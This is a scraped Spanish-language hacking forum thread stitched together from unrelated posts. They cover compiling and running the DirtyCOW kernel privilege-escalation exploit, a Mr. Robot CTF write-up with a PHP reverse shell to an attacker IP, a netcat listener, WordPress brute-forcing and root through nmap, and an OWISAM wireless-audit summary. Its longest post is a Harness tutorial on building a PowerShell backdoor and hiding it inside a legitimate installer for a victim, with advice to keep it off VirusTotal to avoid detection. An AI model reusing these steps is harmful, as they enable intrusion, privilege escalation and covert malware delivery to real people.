Antes que pregunten

Hace unos dias el investigador Phil Oester dio a conocer la vulnerabilidad You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login) la cual nos permite elevar privilegios en sistemas linux en otras palabras, un usuario local sin privilegios podría utilizar esta vulnerabilidad para escribir y tener acceso a partes del sistema que son de otros usuarios, incluido el root.


Ya existe un exploit público en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login para poder explotar dicha aprovecha. Aparte en You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login se ha montado un repositorio sobre todas las pruebas de concepto. 

PoC: Exploit DirtyCOW (Ubuntu 14.04 y Ubuntu 15.10)

Comprobación de versión del Kernel con el comando uname -a




Una vez descargado el exploit procedemos a comentar el payload generado con msfvenom, si estamos en un sistema x86, debemos comentar el payload  para x64 y si nos encontramos en un sistema x64 seria al revés.


Compilando el exploit, esta escrito en C.

gcc 40616.c -o 40616 -pthread

Ahora ejecutamos.

./40616

Bytes:3

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Creo que la versión mas reciente de gcc es la 6.x y vmware necesita la version 5.x

has esto 

update-alternatives --install /usr/bin/gcc gcc /usr/bin/gcc-5 100 --slave /usr/bin/g++ g++ /usr/bin/g++-5

Hola, hace tiempos sin postear nada y vi que cnfs realizo write-up de un ctf, haré lo mismo un pequeño reto que me colocaron en la empresa sin poder utilizar metasploit :c ok, el cual me saco las canas verdes un rato.

Mr. Robot CTF: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

• Comenzando, hice un simple escaneo a la dirección 192.168.1.101 donde lo tengo montado.
  
  
  
  Como vemos el puerto 80 y el 443 están abiertos y el 22 cerrado.
  
  Entramos a la direccion de la maquina victima, y nos mostrava esto :c sin links así que 0 vul que testear xD :c
  
  
  
  Lo siguiente que realize fué buscar arhivos en el servidor para esto utilize la herramienta dirb, después de un rato de espera tenemos resultado
  
  Genial un wordpress :3
  
  
  
  
• y los robots.txt
  
  
  
  Primero le veremos los robots.txt
  
  
  
  Genial, tenemos la 1 key de 3 :3 aparte de esto hay un diccionario que nos servira mucho :3
  
  Como ya se que es un wordpress utilizare la herramienta CMSmap :3 para ver si tiene algun fallo ha explotar
  
  
  
  No fué mucho lo que obtuve :c solo esta parte intersante el cual nos permitia enumerar usuarios a través de un forgotten password.
  
  
• Enumerando Usuarios.
  
  Para esto vamos a usar el diccionario que encontramos en robots.txt haciendo un poco de fuzzing con zap
  
  Zed Attack Proxy (ZAP) es una herramienta proveniente del Proyecto OWASP para realizar tests de penetración en aplicaciones web.
  Zap ya esta incluida por defecto en Kali Linux asi que solo basta con ejectutar en consola zaproxy en consola. Ahora configuramos nuestro proxy nuestro navegador.
  
  Nuestro ataque será dirigido hacía la ruta 192.168.1.101/wp-login
  Login: Devel
  Password: develsecurity
  
  
  
  Nos devuelve la siguiente respuesta en el zaproxy, seleccionamos la respuesta que sería devel, click derecho y seleccionamos la opción de fuzz.
  Para realizar la opción de fuzz utilizare un diccionario de robots.txt.
  
  
  
  Seleccionamos Añadir, y luego Start Fuzzer
  
  Al revisar la respuesta claramente nos dice que el usuario es invalido.
  
  
  
  Como vemos nos marca con un Reflected, y revisando la respuesta nos damos cuenta que nos dice contraseña invalida para el usuario Elliot. Hemos encontrado nuestro usuario.
  
  
  
  
• Ataque de Fuerza Bruta.
  
  Siempre utilizando el diccionario y cmsmap haré un ataque de fuerza bruta, solo que ahora para ahorra tiempo lo acortaremos un poco con la herramienta sort de la siguiente manera. (Gracias a cierto miembro de la empresa por el tip)
  
  cat fsocity.dic | wc -l
  sort -u fsocity.dic | wc -l
  sort -u fsocity.dic > fsocity.small.dic
  
  Ahora utilizamos CMSmap.
  
  
  
  -u = El nombre de usario en nuestro caso sería Elliot
  -p = passwords, el path de nuestro wordlist.
  Listo luego de un tiempo CMSmap completa su trabajo.
  
  Ahora utilizando las credenciales obtenidas:
  
  
  
  
  Listo estamos dentro, :3 ahora solo falta tener un shell inversa en el host :c jaja como regla era no usar metasploit así que me recorde que anteriores ctf un amigo me recomendo shells de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  
  Así que descargamos y configuramos
  
  $ip = '127.0.0.1';  // CHANGE THIS (IP Atacante en nuestro caso 192.168.1.100)
  $port = 1234;       // CHANGE THIS
  
  y en consola pondremos a la escucha netcat: nc -v -n -l -p 1234
  
  Ahora vamos a editar la página de error 404 copiando el codigo de nuestra shell :3
  
  
  
  Ahora ingresamos a la direccion de nuestra shell You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
  
  
  
  Listo :3 estamos dentro ahora solo nos movemos para el /home/robot
  
  
  
  :C bueno aqui fué la parte donde me salieron canas verdes, necesitava una terminal :c contacte con quien me recomendo la php shell y me dijo que en la misma página se encontraba esto: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login , asi que para llamar a la terminal utilizare python -c 'import pty; pty.spawn("/bin/sh")'
  
  
  
  :3 listo tenemos nuestra terminal :3 pero el problema sigue, la key 2 pertenese al usuario robot y nosotros estamos como daemon, pero hay otro archivo intresante el password.raw-md5
  
  
  
  robot:c3fcd3d76192e4007dfb496cca67e13b
  
  Usuario y contraseña como vemos es un md5 y si lo colocamos en google :3 abcdefghijklmnopqrstuvwxyz , ahora ejecutamos su robot
  
  
  
  Ahora si podemos hacer un cat de la segunda key :3
  
  
  
  solo una mas y pwned, para lo siguiente un par de cervezas y cigarros xD, el ultimo flag no lo pude resolver, no encontre como elevar privilegios :c. Les dare la solución que hizo un miembro de la empreza, primero ejecuta nmap, al ver que este estava instalado uso la opción --interactive y luego ejecuto !sh,
  
  Esta opción nos permite ejecutar una terminal como root y bum key 3 :3
  
  
  
  Agradecimiento al team DevelSecurity.
  
  

Viejo amigo que raro verte por los foros aun.

Si la quieren descargar


You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Otra opción seria

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Ya que revivieron un post antiguo talves les guste esto:

git clone You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
cd Subterfuge
python You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Buenas, antes de publicar te invito a que conozcas You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Alguien que la suba a mega xD

Realmente si sirven, pero usarlo no quiere decir que te van a proteger totalmenta al 100% lo que harán será mitigar el riesgo.

Excelente aporte, felicidades por el contenido 

Buen post Brujita, ahora dejare esto por aqui.

En la pasada DEFCON 23 celebrada en las Vegas Nevada se abrio una villa de Biohacking y aqui esta la lista de videos.

Realmente se podria hasta con windows 10 y 7 lo hice con el 8.1 porque ya tenia montada la virtual. En todo caso solo seria de cambiar el payload para x64 o x86 y empezar a jugar con ella, como mencione todo esta en su imaginacion :3

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
@You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login gracias seguire investigando.

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos amigos en este pequeño tutorial atacaremos un sistema windows 8.1 x86 con la herramienta harness.


Harness fue presentada en la DEFCON23 esta tool nos permite generar payload de acceso remoto con la capacidad de proporcioanar una interfaz de control remoto de powershell.

Vamos a ello.

Clonamos el proyecto desde Github

git clone https://github.com/rich5/Harness

Para la instalacion de la herramienta ejecutaremos los siguientes comandos.

cd Harness
chmod 755 python_install.sh
./python_install.sh

wget http://python.org/ftp/python/3.4.3/Python-3.4.3.tar.xz
tar xf Python-3.4.3.tar.xz
cd Python-3.4.3
./configure --prefix=/usr/local --enable-shared LDFLAGS="-Wl,-rpath /usr/local/lib"
make && make altinstall

Tambien se ha corregido el bug con el autocompletado, para eso ejecuta los siguientes comando

apt-get install libssl-dev openssl
apt-get install python3-pip
apt-get install libcurses5-dev
pip3 install readline
python_install.sh

Ahora si stuxnet atack !!! xD

Ejecutamos harness de la siguiente manera

python3.4 harness.py

Ahora listaremos los módulos de la tool de la siguiente manera

show modules

En este caso usare el ultimo payload ya que el windows que atacare es x86, para eso lo cargaremos de la siguiente manera.

load payloads/TCP/x86/exe/Harness_x86

y para ver sus opciones

show options

Ahora procederemos a configurarlo, IP = su ip y PORT el puerto que usaran en mi caso usare el 4444


ahora ya configurado todo ejecutamos el comando run y nos preguntara un nombre en mi caso underc0de.exe, se guardara en la carpeta de harness.


Ahora ejecutamos el comando back y procederemos a configurar el handler

load handlers/PSHandler

ahora lo procederemos a configurarlo

IP = Su IP
PORT = su puerto
SSL = false


Ahora si ejecutamos run y tendremos en escucha nuestro handler xD ahora es hora de hacer un poco de ingeniería social y les mostrare un pequeño método.


IExpress, creador de instaladores :3

Esta tool es nativa desde windows XP que nos permite crear archivos comprimidos y autoinstaladores.

Para esto utilizaremos cualquier aplicación que deseemos, en mi caso utilizare YUMI una simple tool para crear usb boteables y el backdoor


y ahora el tipico siguiente


En esta parte nos pedirá agregar las dos aplicaciones que deseamos :3


y ahora siguiente y configuramos de la siguiente manera para que el backdoor se ejecute en segundo plano


Luego en siguiente y dejamos esto asi


y le ahora siguiente  nos preguntara donde queremos guardar y luego terminar :3 y se genera nuestro autoinstalador para pasarselo a la victima


Ahora cuando nuestra victima ejecute el programa se abrira la aplicación de YUMI y por debajo el backdoor asi dando nuestra session de powershell !!!!


ahora ejecutamos para ver nuestras sesiones

show sessions

Para interactuar con nuestra sesión lo hacemos de la siguiente forma y Fuegoooo en la cocinaa :3 lo que pase después esta en su imaginación.

session 1

Nota: No subaan nada a virustotaaal no quemen esta maravillosa herramienta aun en desarrollo

Bytes:

Hace tiempos que no publicaba nada por aquí asi que hoy les vengo hablar un poco sobre OWISAM (Open Wireless Security Assessment Methodology) esta metodología fue presentada en la RootedCON en el año 2013 por Andrés Tarasco y Miguel Tarasco. Es una metodología abierta para el análisis de seguridad Wireless.

La metodología de seguridad OWISAM define un total de 64 controles técnicos, agrupados en 10 categorías, que especifican un conjunto de pruebas necesarias para garantizar con éxito una auditoría de seguridad sobre una infraestructura inalámbrica

El OWISAM Top 10, que define los principales riesgos de seguridad en las redes inalámbricas se ha consolidado y definido:

CitarOWISAM-TR-001: Red de comunicaciones Wi-Fi abierta.
    OWISAM-TR-002: Presencia de cifrado WEP en redes de comunicaciones.
    OWISAM-TR-003: Algoritmo de generación de claves del dispositivo inseguro (contraseñas y WPS).
    OWISAM-TR-004: Clave WEP/WPA/WPA2 basada en diccionario.
    OWISAM-TR-005: Mecanismos de autenticación inseguros (LEAP,PEAP-MD5,..)
    OWISAM-TR-006: Dispositivo con soporte de Wi-Fi protected setup PIN activo (WPS).
    OWISAM-TR-007: Red Wi-Fi no autorizada por la organización.
    OWISAM-TR-008: Portal hotspot inseguro.
    OWISAM-TR-009: Cliente intentando conectar a red insegura.
    OWISAM-TR-010: Rango de cobertura de la red demasiado extenso.

Pueden ver el video de la presentación


Referencias:

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Para web prefiero BurpSuite xD si le hecho flores por lo sepsi que es, xD hablando fuera de broma entre ZAP y Burp las diferencias no son muchas, cada cual tiene su potencial depende mucho de como lo llegues a usar, ademas considerando que para tener BurpSuite completo es necesario pagar a ello ZAP le ganaal ser Open Source.

Regards,
Snifer

+1 BurpSuite

---

Veil :3